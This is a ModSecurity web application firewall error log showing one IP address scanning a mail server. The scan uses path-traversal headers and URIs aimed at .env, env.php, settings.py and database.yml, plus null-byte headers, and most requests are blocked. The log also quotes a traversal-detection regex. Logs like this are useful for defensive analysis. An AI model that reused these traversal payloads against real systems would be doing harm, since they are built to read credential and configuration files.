[Tue May 12 05:22:55.641701 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.641772 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.641802 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.642025 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.642082 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.642117 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.642527 2026] [security2:error] [pid 1808852:tid 1808863] [client 45.148.10.238:33228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdDxfeipD4uoG21FovDAAAAAg"]
[Tue May 12 05:22:55.936372 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.238:33214] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdDwgpmE1yW0glLdgsaQAAAMI"]
[Tue May 12 05:22:55.936591 2026] [security2:error] [pid 1825287:tid 1825307] [client 45.148.10.238:33214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/app/etc/env.php"] [unique_id "agKdDwgpmE1yW0glLdgsaQAAAMI"]
[Tue May 12 05:22:58.413233 2026] [security2:error] [pid 1808852:tid 1808870] [client 45.148.10.238:60906] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc9RfeipD4uoG21Fou8wAAAA8"]
[Tue May 12 05:22:58.450925 2026] [security2:error] [pid 1825287:tid 1825321] [client 45.148.10.238:22036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc7AgpmE1yW0glLdgsTQAAANA"]
[Tue May 12 05:22:58.558347 2026] [security2:error] [pid 1825179:tid 1825207] [client 45.148.10.238:54210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc2dr1yOh9TvizeziddgAAAEk"]
[Tue May 12 05:22:58.585137 2026] [security2:error] [pid 1844863:tid 1844873] [client 45.148.10.238:33252] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdEvaAnTZtx1_H_wy1dAAAAUQ"]
[Tue May 12 05:22:58.585334 2026] [security2:error] [pid 1844863:tid 1844873] [client 45.148.10.238:33252] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/settings.py"] [unique_id "agKdEvaAnTZtx1_H_wy1dAAAAUQ"]
[Tue May 12 05:22:58.586295 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.586351 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.586377 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.586577 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.586635 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.586667 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.587083 2026] [security2:error] [pid 1842385:tid 1842391] [client 45.148.10.238:33264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdEhs7kySIUZ3ORnIkywAAAQE"]
[Tue May 12 05:22:58.587794 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.238:33238] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.backup"] [unique_id "agKdEhfeipD4uoG21FovEQAAAAU"]
[Tue May 12 05:22:58.587953 2026] [security2:error] [pid 1808852:tid 1808860] [client 45.148.10.238:33238] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.backup"] [unique_id "agKdEhfeipD4uoG21FovEQAAAAU"]
[Tue May 12 05:23:01.762946 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.238:29834] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.letamsgarage.fr"] [uri "/index.php"] [unique_id "agKc5M1tk6y7yBJLpJo3_AAAAIU"]
[Tue May 12 05:23:03.004482 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.238:33294] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.letamsgarage.fr"] [uri "/.env.dev"] [unique_id "agKdFxfeipD4uoG21FovGgAAAAY"]
[Tue May 12 05:23:03.004712 2026] [security2:error] [pid 1808852:tid 1808861] [client 45.148.10.238:33294] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/.env.dev"] [unique_id "agKdFxfeipD4uoG21FovGgAAAAY"]
[Tue May 12 05:23:03.019170 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.019226 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.019255 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.019481 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.019532 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.019566 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.019983 2026] [security2:error] [pid 1825179:tid 1825197] [client 45.148.10.238:33268] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/api/v1"] [unique_id "agKdF9r1yOh9TvizezidxwAAAEA"]
[Tue May 12 05:23:03.023681 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.238:33278] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /assets../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdF_aAnTZtx1_H_wy1dgAAAVI"]
[Tue May 12 05:23:03.023875 2026] [security2:error] [pid 1844863:tid 1844887] [client 45.148.10.238:33278] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.letamsgarage.fr"] [uri "/config/database.yml"] [unique_id "agKdF_aAnTZtx1_H_wy1dgAAAVI"]
